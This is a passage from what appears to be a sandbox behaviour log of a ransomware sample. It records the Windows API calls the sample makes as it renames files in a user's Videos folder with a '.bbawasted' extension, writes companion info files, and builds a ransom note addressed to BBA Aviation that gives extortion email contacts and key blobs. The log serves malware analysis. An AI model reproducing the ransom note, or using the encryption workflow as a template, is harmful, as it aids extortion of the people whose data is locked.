dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0229.375] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.376] SetEndOfFile (hFile=0x28c) returned 1 [0229.376] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.376] lstrcpyW (in: lpString1=0x6c4c2c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\kMiQJK0UijpsgS.avi" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\kmiqjk0uijpsgs.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\kMiQJK0UijpsgS.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\kmiqjk0uijpsgs.avi.bbawasted")) returned 1 [0229.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\4P0plb\\kMiQJK0UijpsgS.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\4p0plb\\kmiqjk0uijpsgs.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0229.377] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0229.378] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1311 [0229.378] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1311) returned 0x5f0000 [0229.378] CloseHandle (hObject=0x27c) returned 1 [0229.378] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.378] CloseHandle (hObject=0x290) returned 1 [0229.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0229.379] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6570) returned 1 [0229.379] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0229.379] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0229.379] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a64e8) returned 1 [0229.380] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0229.380] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0229.389] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0229.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0229.389] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.389] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WI5cTLmOD7zF56guZ32j6bhHgHvJwPXqPPVIZuoTcYh7jINNx43tXx/BuCADgby2\r\ngbTfd04UufGsB7ZqqfbdLLHmZ+UNMHnsKP8/b//+8Q5yfAnCg0L+wFewuTvU2694\r\nqWqmZviekpBB9OajI3s/7g5TvWAZdvTf+karxkE+pcndzh2ipSS0zqqCG3xPEEyP\r\nK9N32fpMITPh26dNGAQhX1CmukoDYIVZCc2gQwuhMYzzyrwsOOcqcBgdIjB9Mxf3\r\nQANgoE1JRnSB1G68M/ZQRbRRn4bKdUqkQ3FGB7OA7zTmreqffoRsxta5N6p0bTEu\r\nGI3pa3pe1HVdqlVa5PmSDMVeOaTucS+0d9r55IQjBQ4juLMWFXUNBhnmsBhIUbN0\r\nhCu5C/MSmmfvNmODXhu3wSInzsyDsgr/R0+cWF9hwxlc4okQp/3o9UGLN4WDbPy1\r\nq6TIT0orWQ8dwyBJSPZK2gohbz7IX2HNjUNvwGdLAUl+lcEuWFr0QD1UDIlQzqSt\r\n+Wuu9oiJTynQcqiCTKvvZjWAxvq1UDsUvPNbjtmGAAoQ0gGLAn5lf1UxIZkqsSzd\r\ng5ByZ9H35opr7sa30O7g+NR7HMJDA6ig6uinD+lae2ftmh0N4WKqvIWhgdQUgTe+\r\n3RXciMcK+3kjjvaKScJyMyOQDCOdVpOK7tFIGUlQOkJ=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.389] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0229.389] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0229.389] SetEndOfFile (hFile=0x28c) returned 1 [0229.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.391] CloseHandle (hObject=0x28c) returned 1 [0229.391] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.392] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be7b8 | out: hHeap=0x660000) returned 1 [0229.392] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a68a0) returned 1 [0229.392] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0229.392] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0229.392] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\A Oqn3l2.flv") returned 69 [0229.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x294) returned 0x6c4b88 [0229.392] lstrcpyW (in: lpString1=0x6c4c12, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.393] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.393] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6a38) returned 1 [0229.393] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0229.393] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0229.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\A Oqn3l2.flv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\a oqn3l2.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0229.394] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.395] SetEndOfFile (hFile=0x28c) returned 1 [0229.395] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.395] lstrcpyW (in: lpString1=0x6c4c12, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\A Oqn3l2.flv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\a oqn3l2.flv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\A Oqn3l2.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\a oqn3l2.flv.bbawasted")) returned 1 [0229.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\A Oqn3l2.flv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\a oqn3l2.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0229.396] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0229.396] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x107b8 [0229.396] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x107b8) returned 0x5f0000 [0229.396] CloseHandle (hObject=0x290) returned 1 [0229.398] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.399] CloseHandle (hObject=0x27c) returned 1 [0229.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0229.399] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6928) returned 1 [0229.400] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0229.400] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0229.400] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a5f10) returned 1 [0229.400] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0229.400] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0229.409] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0229.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0229.409] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.409] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RQQN1ljroCwDnbMayPBAJiSvxIPL0lqsD3E9ScZ3XNvo/gCWnMqeIlJw8kXdWUzL\r\nQViCSn8pgUcaF/srRHim95qYLQPB1gCe++ho0hek9GGhtRe2hGkZhgGZEy0N7frR\r\nMgpRCbyy5eB/DpV8c6ygxWAOpFQwTZFtluJah9rS+oLd3Eu1GB65PhGnck7Fcdim\r\nJCcSJLac+gcu79g9oO87KNPg1aIlb8iE7jKJu2oa1pMJas9zVgz/Syog8m2rtHKZ\r\nXBQBMmnPZB6vqySgMqTzgDteT86YzsniQnk9gHn3G4IHK0CfvXXCFL9Fjto4KAMr\r\nP309m1wT9dKNm5Q+ssJX3Pv2NP3iY9GVCdREvtPDnJRsveMAUWsE5brdmiX5e2ZO\r\ndVzJBuIJz+CMrXRywj1pUnpDwioRgpTsl2tSj+AV87TxCeyLbvLVIe/bZEAB4gqc\r\ny165blP0WuR0uRW2kplJQhX43sO8L69EW/r7ioxERcsrLNDtWV8HAaVMDNzwcLis\r\nSL4cf6isguPhcHix3ilI91JDVqWWOmE7FNGK5c+YNraRylMoGM5gNzT4d/mxi+HE\r\nmwqdWDnFli56IyEWs+ZO8lRyAZLvtA944e1KKj8trKUXbw5w1TjCHPzi/9daClTp\r\nuRgsY5/+kSaDMMZ00LaCfvsLmzmCvt7ndyFOsNlsjXZ=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.409] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0229.409] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0229.409] SetEndOfFile (hFile=0x28c) returned 1 [0229.578] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.578] CloseHandle (hObject=0x28c) returned 1 [0229.578] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.579] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ba450 | out: hHeap=0x660000) returned 1 [0229.579] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a63d8) returned 1 [0229.580] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0229.580] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0229.580] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\LQb3PlQ-c1Rl0.avi") returned 74 [0229.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x29e) returned 0x6c4b88 [0229.580] lstrcpyW (in: lpString1=0x6c4c1c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.580] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.580] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6818) returned 1 [0229.581] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0229.581] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0229.581] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\LQb3PlQ-c1Rl0.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\lqb3plq-c1rl0.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0229.582] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.583] SetEndOfFile (hFile=0x28c) returned 1 [0229.583] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.583] lstrcpyW (in: lpString1=0x6c4c1c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\LQb3PlQ-c1Rl0.avi" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\lqb3plq-c1rl0.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\LQb3PlQ-c1Rl0.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\lqb3plq-c1rl0.avi.bbawasted")) returned 1 [0229.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\LQb3PlQ-c1Rl0.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\lqb3plq-c1rl0.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0229.585] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0229.585] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x15441 [0229.585] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15441) returned 0x600000 [0229.585] CloseHandle (hObject=0x294) returned 1 [0229.588] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0229.589] CloseHandle (hObject=0x280) returned 1 [0229.589] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0229.589] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a5f10) returned 1 [0229.590] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0229.590] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0229.590] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6bd0) returned 1 [0229.591] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0229.591] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0229.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0229.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0229.602] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.602] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]B7Ub7orSBSMBPNeSk770mE4LBXa9cLFH1z4kAyJafnijQkriynznw/B2uuZ7Cz23\r\nBQydNFJGDLGe9LjZB3scCtsCGq90UQkzoR2sKqcFe9WKTX55RyKQmheKtCg2y1T+\r\nBqel1r3C33iuUop+80yvdrRPqoslkVGjo35lyZh/vu9IqjvxknPNGi7vSpOjReGK\r\nTD3YbRaQdtw4IV6LdVccUwfOekR0VrEkK8F9zlX0/4HPAxWWhIYqlm92nB3e72B4\r\nlaXn5oxlpzcqua0vSubOs7AHuDTTwpV1QYqcpwBeyxAhEEEufouYXn4UgQQL4FmQ\r\nNWEPsIc6oyukrn4uMXPxAUDZLopEUcGSG/6DjT0nm8zXGO55MVpy9wD1wK+5ZLN3\r\nl18UfqLVZVw7Mh2Ykb2VB/kOJp7pHomHcINhPe1j3+UWdIZaH/Yk7E0F6gScYzuM\r\n1GlOCD1OUezJTKkg+9ipnrfT77/xhTB1re8z2Y2Giw0Z7MiTKNU2KltoxtWZHn7S\r\nYMTVOOfazre3xXXzdzTtmIar0x4EpbY0/TvGeDVIK3WjgSICBOZ/3vvYyT8FGuig\r\nAVv765Pgy5BmVfG/GHwfQDGqizwSHgRre/sleNOtYs12RDV4DgX3xSxLmTcDBJ/J\r\n55N6CfDtvPd/Yvcbg938bHTwGmXbZrtIFl8ZWFQB/vE=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.602] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0229.602] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0229.602] SetEndOfFile (hFile=0x28c) returned 1 [0229.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.605] CloseHandle (hObject=0x28c) returned 1 [0229.605] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.606] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6beb98 | out: hHeap=0x660000) returned 1 [0229.606] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a61b8) returned 1 [0229.606] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0229.606] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0229.606] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\OeTMrntM7irAJ8Qb.swf") returned 77 [0229.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a4) returned 0x6beb98 [0229.607] lstrcpyW (in: lpString1=0x6bec32, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.607] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.607] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6928) returned 1 [0229.607] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0229.607] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0229.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\OeTMrntM7irAJ8Qb.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\oetmrntm7iraj8qb.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0229.609] WriteFile (in: hFile=0x28c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.610] SetEndOfFile (hFile=0x28c) returned 1 [0229.610] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.610] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.610] lstrcpyW (in: lpString1=0x6bec32, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.610] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\OeTMrntM7irAJ8Qb.swf" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\oetmrntm7iraj8qb.swf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\OeTMrntM7irAJ8Qb.swf.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\oetmrntm7iraj8qb.swf.bbawasted")) returned 1 